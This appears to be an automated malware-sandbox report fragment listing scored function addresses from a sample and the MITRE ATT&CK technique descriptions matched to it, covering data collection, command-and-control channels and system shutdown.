Function 0114EFB0 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 007739D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 0114ED80 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 145
fileCOMMON

Function 0077407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Function 0077686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260
COMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre